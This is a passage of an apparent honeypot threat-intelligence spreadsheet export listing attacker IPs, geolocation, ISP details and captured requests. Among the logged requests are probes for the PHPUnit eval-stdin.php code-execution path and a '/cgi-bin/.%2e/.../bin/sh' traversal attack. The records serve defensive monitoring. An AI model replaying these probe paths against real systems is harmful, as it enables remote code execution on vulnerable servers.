'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '105', 'Content-Type': 'text/plain', 'Host': '38.60.224.106:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '105', 'Content-Type': 'text/plain', 'Host': '144.126.148.5:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b93c:8825"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1238"/>
    <x v="1238"/>
    <s v="NA&amp;&amp;static-68-235-46-166.cust.tzulo.com"/>
    <x v="0"/>
    <d v="2025-04-18T18:17:59"/>
    <d v="2025-04-12T04:23:17"/>
    <d v="2025-04-18T18:17:59"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MA"/>
    <s v="Massachusetts"/>
    <s v="Essex"/>
    <s v="Topsfield"/>
    <s v="4953127"/>
    <s v="01983"/>
    <s v="42.6376"/>
    <s v="-70.9495"/>
    <s v="11878"/>
    <s v="tzulo, inc."/>
    <s v="tzulo, inc."/>
    <s v="hosting"/>
    <s v="tzulo, inc."/>
    <s v="2010-03-10"/>
    <s v="TZULO"/>
    <s v="2012-02-24"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-04-19 04:30:40"/>
    <s v="2026-04-19 04:30:40"/>
    <s v="2025-03-21 06:21:29"/>
    <s v="['NS1.TZULO.COM', 'NS2.TZULO.COM']"/>
    <s v="ENOM, INC."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Whois Agent (081135083)"/>
    <x v="10"/>
    <s v="NA"/>
    <s v="['PO Box 639', 'C/O tzulo.com']"/>
    <s v="::ffff:44eb:2ea6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1239"/>
    <x v="1239"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T17:50:39"/>
    <d v="2024-06-13T11:12:45"/>
    <d v="2025-04-18T17:50:39"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;22&amp;&amp;389&amp;&amp;80&amp;&amp;26031&amp;&amp;445&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AZ"/>
    <s v="Azerbaijan"/>
    <s v="ABS"/>
    <s v="Abşeron"/>
    <s v="NA"/>
    <s v="Saray"/>
    <s v="585145"/>
    <s v="NA"/>
    <s v="40.533"/>
    <s v="49.7168"/>
    <s v="203971"/>
    <s v="AzFiberNet Ltd."/>
    <s v="AzFiberNet Ltd."/>
    <s v="residential"/>
    <s v="Datacenter"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9de:5fb2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1240"/>
    <x v="1240"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T17:01:50"/>
    <d v="2024-04-25T12:42:44"/>
    <d v="2025-04-18T17:01:50"/>
    <n v="108"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;41984&amp;&amp;3306&amp;&amp;8291&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="18"/>
    <s v="Ninh Bình Province"/>
    <s v="Yên Khánh District"/>
    <s v="Yên Ninh"/>
    <s v="1560143"/>
    <s v="NA"/>
    <s v="20.184"/>
    <s v="106.061"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.160.202.198,57831)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a0:cac6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to scan for open ports and services on a target system, likely using a script or tool to automate the process. They are sending out probes and requests to various services, such as FTP, HTTP, HTTPS, DNS, etc., in an attempt to identify vulnerabilities and potential entry points. &amp;&amp; The attacker is scanning for and attempting to exploit various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and other protocols. The attacker is likely using a script or tool to quickly scan and attempt to connect to these services in an automated manner."/>
    <s v="Port scanning attack &amp;&amp;  "/>
  </r>
  <r>
    <x v="1241"/>
    <x v="1241"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T16:51:34"/>
    <d v="2024-02-03T12:48:00"/>
    <d v="2025-04-18T16:51:34"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ftp']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="57972&amp;&amp;21"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'rbl.interserver.net': ['unknown']}"/>
    <n v="65"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="47359"/>
    <s v="Tvoi Net Ltd."/>
    <s v="Tvoi Net Ltd."/>
    <s v="business"/>
    <s v="Citynet Network"/>
    <s v="2010-06-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="None&amp;&amp;{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2d2:cb3e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1242"/>
    <x v="1242"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T16:01:15"/>
    <d v="2025-04-15T07:43:24"/>
    <d v="2025-04-18T16:01:15"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="X"/>
    <s v="Cordoba"/>
    <s v="Departamento de Capital"/>
    <s v="Córdoba"/>
    <s v="3860259"/>
    <s v="NA"/>
    <s v="-31.4135"/>
    <s v="-64.1811"/>
    <s v="7303"/>
    <s v="Telecom Argentina S.A."/>
    <s v="Telecom Argentina S.A"/>
    <s v="residential"/>
    <s v="Fibertel"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b51f:79e0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1243"/>
    <x v="1243"/>
    <s v="daisy.probe.onyphe.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-18T15:11:28"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-18T15:11:28"/>
    <n v="133"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_DHCP_H24&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_LDAP_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;53&amp;&amp;8112&amp;&amp;53&amp;&amp;19459&amp;&amp;389&amp;&amp;143&amp;&amp;67&amp;&amp;46907&amp;&amp;21740&amp;&amp;1433&amp;&amp;6379&amp;&amp;5900&amp;&amp;443&amp;&amp;5432&amp;&amp;8443&amp;&amp;110&amp;&amp;NA&amp;&amp;1521&amp;&amp;38227&amp;&amp;23&amp;&amp;80&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="66"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="BRE"/>
    <s v="Brittany"/>
    <s v="Ille-et-Vilaine"/>
    <s v="Saint-Grégoire"/>
    <s v="2979619"/>
    <s v="35760"/>
    <s v="48.157"/>
    <s v="-1.6881"/>
    <s v="16276"/>
    <s v="OVH SAS"/>
    <s v="OVH SAS"/>
    <s v="hosting"/>
    <s v="ONYPHE"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.218,38535)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.218,37243)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b220:48da"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1244"/>
    <x v="1244"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T14:50:21"/>
    <d v="2025-03-21T20:54:12"/>
    <d v="2025-04-18T14:50:21"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;58707&amp;&amp;58711"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="NTR"/>
    <s v="Vijayawada"/>
    <s v="1253184"/>
    <s v="520001"/>
    <s v="16.5062"/>
    <s v="80.648"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="2006-12-19"/>
    <s v="ABTS-AP-DSL-9112-hyd"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aaf:b50"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1245"/>
    <x v="1245"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T14:12:14"/>
    <d v="2025-01-18T16:54:43"/>
    <d v="2025-04-18T14:12:14"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="BC"/>
    <s v="British Columbia"/>
    <s v="Metro Vancouver Regional District"/>
    <s v="Vancouver (East Vancouver)"/>
    <s v="6173331"/>
    <s v="V5T"/>
    <s v="49.2617"/>
    <s v="-123.097"/>
    <s v="852"/>
    <s v="TELUS Communications Inc."/>
    <s v="TELUS Communications Inc"/>
    <s v="residential"/>
    <s v="TELUS-FIBRE-VANCBC08"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6cb4:6176"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1246"/>
    <x v="1246"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T14:11:38"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-18T14:11:38"/>
    <n v="258"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Credential Stuffing"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H10&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_SMTP_H18&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;53&amp;&amp;16244&amp;&amp;61905&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="KU"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="598316"/>
    <s v="44001"/>
    <s v="54.9072"/>
    <s v="24.0019"/>
    <s v="209605"/>
    <s v="UAB Host Baltic"/>
    <s v="UAB Host Baltic"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
